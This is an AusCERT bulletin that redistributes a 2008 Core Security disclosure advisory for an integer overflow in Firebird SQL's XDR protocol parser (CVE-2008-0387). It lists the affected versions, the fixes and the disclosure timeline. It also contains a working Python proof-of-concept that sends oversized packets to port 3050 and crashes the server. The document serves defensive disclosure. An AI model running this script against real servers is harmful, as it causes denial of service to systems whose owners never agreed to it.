-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                  ESB-2008.0099 -- [Win][UNIX/Linux][OSX]
                     Firebird Remote Memory Corruption
                              30 January 2008

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:              Firebird SQL 1.0.3 and prior
                      Firebird SQL 1.5.5 and prior
                      Firebird SQL 2.0.3 and prior
                      Firebird SQL 2.1.0 Beta 2 and prior
Publisher:            Core Security Technologies
Operating System:     Windows
                      UNIX variants (UNIX, Linux, OSX)
Impact:               Execute Arbitrary Code/Commands
                      Denial of Service
CVE Names:            CVE-2008-0387 CVE-2008-0467

Original Bulletin:    http://www.coresecurity.com/?action=item&id=2095

Comment: This advisory contains two CVE numbers which are both corrected by
         the same resolution as the included CORE Security advisory.
         
         The additional CVE references a vulnerability due to lack of boundary
         checks in the username.

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


     Core Security Technologies - CoreLabs Advisory
          http://www.coresecurity.com/corelabs


           Firebird Remote Memory Corruption

*Advisory Information*

Title: Firebird Remote Memory Corruption
Advisory ID:  CORE-2007-1219
Advisory URL: http://www.coresecurity.com/?action=item&id=2095
Date published: 2008-01-28
Date of last update: 2008-01-24
Vendors contacted: Firebird SQL
Release mode: Coordinated Release

*Vulnerability Information*

Class: Memory corruption
Remotely Exploitable: Yes
Locally Exploitable: Yes
Bugtraq ID: 27403
CVE Name: CVE-2008-0387

*Vulnerability Description*

Firebird [1][2] is a relational database that runs on Linux, Windows,
and a variety of Unix platforms. The Firebird Project is a commercially
independent project of C and C++ programmers, technical advisors and
supporters developing and enhancing a multi-platform relational database
management system based on the source code released by Inprise Corp (now
known as Borland Software Corp) on 25 July, 2000.

The Firebird database manager contains an Integer Overflow in the
processing of certain tags on the XDR protocol used for communication
with the server. This led the server to corrupt the process memory and
crash. Repeated attempts are followed by a crash of the process in
charge of restarting the database server. This may also grant attackers
remote execution of arbitrary code on servers running Firebird.

*Vulnerable packages*

. Firebird SQL 1.0.3 and before.
. Firebird SQL 1.5.5 and before.
. Firebird SQL 2.0.3 and before.
. Firebird SQL 2.1.0 Beta 2 and before.

*Non-vulnerable packages*

. Firebird SQL 1.5.6 (to be released)
. Firebird SQL 2.0.4 (to be released)
. Firebird SQL 2.1.0 RC1

*Vendor Information, Solutions and Workarounds*

Firebird v2.1.0 RC1 fixes this vulnerability and is available for
download at http://firebirdsql.org/index.php?op=files&id=fb210_RC1

The fix will also be included in versions v1.5.6 and v2.0.4.  Version
2.0.4 will be released in February. The version 1.5.6 release is
expected later this year.

The issue is registered [3] in Firebird Tracker as CORE-1681.

*Credits*

This vulnerability was discovered and researched by Damian Frizza with
assistance of Alfredo Ortega from Core Security Technologies.

*Technical Description / Proof of Concept Code*

The memory corruption happens when the parser (src/remote/protocol.cpp)
receives any of the following operations with invalid data:

op_receive
op_start
op_start_and_receive
op_send
op_start_and_send
op_start_send_and_receive

The parser fails to properly sanitize certain variables before use. We
can see that in the file src/remote/protocol.cpp there are the following
assignments directly from the packet buffer to the data structure,
without any validation (The MAP macro doesn't have any range checking):

src/remote/protocol.cpp:417

		MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));
		MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_incarnation));
		MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_transaction));
		MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_message_number));
		/* Changes to this op's protocol must mirror in xdr_protocol_overhead */
		return xdr_request(xdrs, data->p_data_request,
			data->p_data_message_number,
			data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);

And in the function xdr_request(), the variable data->p_data_request (as
request_id) is used to index an array:

	...
	rrq* request = (rrq*) port->port_objects[request_id];
	...

Corrupting memory structures and causing a DoS of the server, with
possible execution of code. The same happens with the variable
data->p_data_message_number.

The following python PoC causes a remote Denial of service and
demonstrates the bug:

##Firebird DoS
##Damian Frizza - Core Security Exploit Writers Team
##tested against Firebird-2.0.3.12981-1-Win32.exe and
##Firebird-2.1.0.16780_0_Win32.exe

##fbserver.exe 2.0.3
##005637D0   8B4424 08        MOV EAX,DWORD PTR SS:[ESP+8]
##005637D4   0FB700           MOVZX EAX,WORD PTR DS:[EAX]
##005637D7   83EC 50          SUB ESP,50
##005637DA   56               PUSH ESI
##005637DB   8BF1             MOV ESI,ECX
##005637DD   8B8E AC000000    MOV ECX,DWORD PTR DS:[ESI+AC]
##005637E3   3B41 08          CMP EAX,DWORD PTR DS:[ECX+8]     <----
##CRASH HERE


import socket
import time

def getTargetIP():
    return '192.168.xxx.xxx'


port= 3050
op = '\x4a'


packet = '\x00\x00\x00' + op +  'A' * 2000


##Making the connection and sending the data 5 times, fbguard.exe fails
##to restart the service.

for i in range(0, 5):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((getTargetIP(), port))
    s.send(str(packet))
    s.close()
    time.sleep(1)

*Report Timeline*

2008-01-04: Initial notification sent by CoreLabs to Firebird SQL
development team.
2008-01-08: Notification acknowledged by Firebird SQL development team.
2008-01-08: Technical details sent by Core to Firebird SQL dev. team.
2008-01-10: Firebird SQL dev. team notifies Core that a fix has been
produced, and will be released in Firebird versions v1.5.6, v2.0.4 and
v2.1.0 RC1.
2008-01-10: CoreLabs acknowledges information about fixes and requests
date of the v2.1.0 RC1 release to the Firebird dev. team.
2008-01-15: Firebird dev. team confirms vendor information and dates of
fixed versions.


*References*

[1] http://sourceforge.net/projects/firebird/
[2] http://www.firebirdsql.org/
[3] http://tracker.firebirdsql.org/browse/CORE-1681

*About Corelabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core augments its
leading technology solution with world-class security consulting
services, including penetration testing and software security auditing.
Based in Boston, MA and Buenos Aires, Argentina, Core Security
Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com .

*DISCLAIMER*

The contents of this advisory are copyright (c) 2008 CORE Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

*PGP/GPG KEYS*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc

- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHnhGQyNibggitWa0RAjcmAJ94rGoTbUBQALmV5yOudJfL4B038QCgpzNw
dFwDpUnOO6OHI0L45rIwyFU=
=dlYg
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

If you believe that your computer system has been compromised or attacked in 
any way, we encourage you to let us know by completing the secure National IT 
Incident Reporting Form at:

        http://www.auscert.org.au/render.html?it=3192

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================

-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQCVAwUBR5/oJih9+71yA2DNAQKB1AP/aIlFxqPFd6eowyWIYU68qbwJvXIAM0UE
xiDluI1WohcgDwguKkuCNldlQj/NxD/adM1A4Wvq57Pl8+EPUvMhby40AdZ0UYqK
f+LMtV9RP/PSNz0m2MyMg9XOl8GYq4j1SJVd8us1iiJMan49OGYOGT9Ux9GVGAKb
F1H7CgiAWUs=
=6yD1
-----END PGP SIGNATURE-----